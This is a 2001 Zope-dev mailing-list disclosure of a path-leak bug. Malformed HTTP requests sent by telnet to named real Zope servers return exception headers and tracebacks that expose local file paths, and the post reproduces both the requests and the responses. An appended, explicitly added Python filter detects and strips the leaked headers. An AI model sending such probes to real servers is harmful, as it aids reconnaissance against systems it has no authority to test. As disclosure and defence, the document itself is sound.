[Zope-dev] Vulnerability in Zope
ALife <buginfo@inbox.ru>
Sun, 23 Sep 2001 14:19:35 +0000 (GMT)
Found vulnerability: retrieve a full path to local files in Zope.
---[ Example 1 (Linux):
telnet www.zope.org 80
PROPFIND / HTTP/1.0
F
G
H
J
K
L
HTTP/1.0 500 Internal Server Error
Server: Zope/Zope 2.3.2 (source release, python 1.5.2, linux2) ZServer/1.1b1
Date: Mon, 10 Sep 2001 15:38:59 GMT
Content-Length: 7058
Ms-Author-Via: DAV
Bobo-Exception-File: /usr/local/base/Zope-2.3.2-modified/lib/python/OFS/PropertySheets.py
Bobo-Exception-Type: TypeError
Content-Type: text/html
Bobo-Exception-Value: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <HTML> <HEAD> <TITLE>Welcome to Zope.org</TITLE> <link rel="stylesheet" href="http://www.zope.org/zope_css" type="text/css"> </HEAD> <BODY B
Bobo-Exception-Line: 369
...
<!--
Traceback (innermost last):
  File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 223, in publish_module
  File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 187, in publish
  File /usr/local/base/Zope-2.3.2-modified/lib/python/Zope/__init__.py, line 221, in zpublisher_exception_hook
    (Object: ApplicationDefaultPermissions)
  File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 171, in publish
  File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/mapply.py, line 160, in mapply
    (Object: PROPFIND)
  File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 112, in call_object
    (Object: PROPFIND)
  File /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/Resource.py, line 222, in PROPFIND
    (Object: ApplicationDefaultPermissions)
  File /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/davcmds.py, line 219, in apply
  File /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/davcmds.py, line 219, in apply
  File /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/davcmds.py, line 219, in apply
  File /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/davcmds.py, line 219, in apply
  File /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/davcmds.py, line 175, in apply
  File /usr/local/base/Zope-2.3.2-modified/lib/python/OFS/PropertySheets.py, line 369, in dav__allprop
    (Object: Virtual)
TypeError: (see above)
-->
Host has closed connection.
---[ Example 2 (Linux):
telnet www.zope.com 80
GGGG / HTTP/1.0
or NOTREALCOMMAND / HTTP/1.0
HTTP/1.0 404 Not Found
Server: Zope/Zope 2.3.2 (source release, python 1.5.2, linux2) ZServer/1.1b1
Date: Fri, 21 Sep 2001 12:51:48 GMT
Bobo-Exception-File: /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/HTTPResponse.py
Content-Type: text/html
Bobo-Exception-Type: NotFound
Bobo-Exception-Value: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <HTML> <HEAD> <TITLE>Welcome to Zope.org</TITLE> <link rel="stylesheet" href="http://www.zope.org/zope_css" type="text/css"> </HEAD> <BODY B
Content-Length: 5845
Bobo-Exception-Line: 547
< ... >
<!--
Traceback (innermost last):
  File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 223, in publish_module
  File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 187, in publish
  File /usr/local/base/Zope-2.3.2-modified/lib/python/Zope/__init__.py, line 221, in zpublisher_exception_hook
    (Object: ApplicationDefaultPermissions)
  File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 173, in publish
  File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/HTTPResponse.py, line 308, in setBody
  File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/HTTPResponse.py, line 547, in notFoundError
NotFound: (see above)
-->
Host has closed connection.
---[ Example 3 (Win32):
OPTIONS / HTTP/1.0
or NOTREALCOMMAND / HTTP/1.0
HTTP/1.0 404 Not Found
Server: Zope/Zope 2.3.2 (binary release, python 1.5.2, win32-x86) ZServer/1.1b1
Date: Mon, 10 Sep 2001 15:06:43 GMT
Bobo-Exception-File: D:\INSTOC~1\lib\python\webdav\NullResource.py
Bobo-Exception-Type: Not Found
Content-Type: text/html
Location: http://SERVERNAME
Bobo-Exception-Value: bobo exception
Content-Length: 756
Bobo-Exception-Line: 122
<html><head><title>::</title></head><body bgcolor="#FFFFFF">
<h2>Ошибка!</h2>
<p>Ошибка при попытке опубликовать ресурс.</p>
<hr noshade>
</body></html>
<!--
Traceback (innermost last):
  File D:\INSTOC~1\lib\python\ZPublisher\Publish.py, line 223, in publish_module
  File D:\INSTOC~1\lib\python\ZPublisher\Publish.py, line 187, in publish
  File D:\INSTOC~1\lib\python\Zope\__init__.py, line 221, in zpublisher_exception_hook
    (Object: iVirtualHostBase)
  File D:\INSTOC~1\lib\python\ZPublisher\Publish.py, line 162, in publish
  File D:\INSTOC~1\lib\python\ZPublisher\BaseRequest.py, line 340, in traverse
  File D:\INSTOC~1\lib\python\webdav\NullResource.py, line 122, in __bobo_traverse__
    (Object: iVirtualHostBase)
Not Found: (see above)
-->
Host has closed connection.
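
An added example, not part of the original post: a response filter that a defender could run in front of an affected server to detect, and then strip, the two disclosure channels shown above (the Bobo-Exception-* headers and the traceback in the trailing HTML comment). The function names and the sample response are constructed for illustration.

```python
import re

# Constructed sample, modelled on the 404 response shown in Example 2.
SAMPLE = (
    b"HTTP/1.0 404 Not Found\r\n"
    b"Server: Zope/Zope 2.3.2 (source release, python 1.5.2, linux2) ZServer/1.1b1\r\n"
    b"Bobo-Exception-File: /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/HTTPResponse.py\r\n"
    b"Content-Type: text/html\r\n"
    b"Bobo-Exception-Type: NotFound\r\n"
    b"Bobo-Exception-Line: 547\r\n"
    b"\r\n"
    b"<html><body>Not found</body></html>\n"
    b"<!--\nTraceback (innermost last):\n"
    b"  File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 223, in publish_module\n"
    b"NotFound: (see above)\n-->\n"
)

TRACEBACK_COMMENT = re.compile(rb"<!--\s*Traceback \(innermost last\):.*?-->\s*", re.S)
FILE_LINE = re.compile(rb"File (\S.*?), line \d+")

def split_response(raw):
    """Split a raw HTTP response into (status line, header lines, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    return lines[0], lines[1:], body

def find_disclosures(raw):
    """Return the sorted filesystem paths leaked via headers or traceback."""
    _, headers, body = split_response(raw)
    paths = set()
    for h in headers:
        name, _, value = h.partition(b":")
        if name.strip().lower() == b"bobo-exception-file":
            paths.add(value.strip().decode("latin-1"))
    for m in TRACEBACK_COMMENT.finditer(body):
        for f in FILE_LINE.finditer(m.group(0)):
            paths.add(f.group(1).decode("latin-1"))
    return sorted(paths)

def scrub(raw):
    """Drop Bobo-Exception-* headers and the traceback; fix Content-Length."""
    status, headers, body = split_response(raw)
    drop = (b"bobo-exception-", b"content-length:")
    kept = [h for h in headers if not h.lower().startswith(drop)]
    body = TRACEBACK_COMMENT.sub(b"", body)
    kept.append(b"Content-Length: %d" % len(body))
    return b"\r\n".join([status] + kept) + b"\r\n\r\n" + body
```
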